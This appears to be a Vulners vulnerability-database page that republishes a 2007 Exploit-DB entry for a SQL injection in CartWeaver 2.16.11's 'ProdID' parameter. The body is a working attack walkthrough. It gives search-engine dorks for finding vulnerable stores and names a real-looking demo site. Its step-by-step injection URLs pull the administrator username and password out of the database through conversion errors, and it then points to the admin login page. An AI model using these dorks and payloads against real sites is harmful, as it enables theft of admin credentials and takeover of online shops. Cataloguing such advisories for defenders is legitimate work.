Lucene search
+L

Cartweaver 2.16.11 - 'ProdID' SQL Injection

🗓️ 06 Aug 2007 00:00:00Reported by meoconxType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 112 Views

SQL Injection vulnerability in CartWeaver allows unauthorized access to admin credentials.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2006-2046
26 Apr 200620:00
cve
cvelist
Cvelist
CVE-2006-2046
26 Apr 200620:00
cvelist
exploitdb
Exploit DB
Cartweaver 2.16.11 - 'Results.cfm' SQL Injection
25 Apr 200600:00
exploitdb
exploitdb
Exploit DB
Cartweaver 2.16.11 Details.cfm ProdID Parameter SQL Injection
25 Apr 200600:00
exploitdb
euvd
EUVD
EUVD-2006-2047
7 Oct 202500:30
euvd
nvd
NVD
CVE-2006-2046
26 Apr 200620:06
nvd
prion
Prion
Sql injection
26 Apr 200620:06
prion
prion
Prion
Sql injection
30 Jun 200818:24
prion
author:meoconx[at]vnbrain.net
product:CartWeaver
main site:www.cartweaver.com
1.with CFM CartWeaver:
sql injection in:
Details.cfm?ProdID=a'

demo:
http://www.jbracing.co.uk/Details.cfm?ProdID=1'
****************
exploit:
http://www.xxx.com/Details.cfm?ProdID=[sql query]
****************
link admin:
http://www.xxx.com/[script path]/cw2/admin/
****************
dork:
allinurl:Details.cfm ?ProdID=
allinurl:Results.cfm?category=
***************
********************
An example:
http://www.xxxxx.co.uk/Details.cfm?ProdID=1'
********************
exploit it:
-get username:
http://www.xxxxx.co.uk/Details.cfm?ProdID=1%20and%201=convert(int,(select%20top%201%20admin_username%20from%20tbl_adminusers))
Conversion failed when converting the nvarchar value 'jim' to data type int.
==> the username is "jim"
-get password:
http://www.xxxxx.co.uk/Details.cfm?ProdID=1%20and%201=convert(int,(select%20top%201%20char(97)%2badmin_password%20from%20tbl_adminusers))
Conversion failed when converting the nvarchar value 'a518888' to data type int. The error occurred. on line 116.
==> the password is "51888"( because we added the "a" in the query to get the number that can be converted to integer value)
-now, login into admin:
http://www.xxxxx.co.uk/cw2/admin/

# milw0rm.com [2007-08-06]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Dec 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.4
EPSS0.04049
112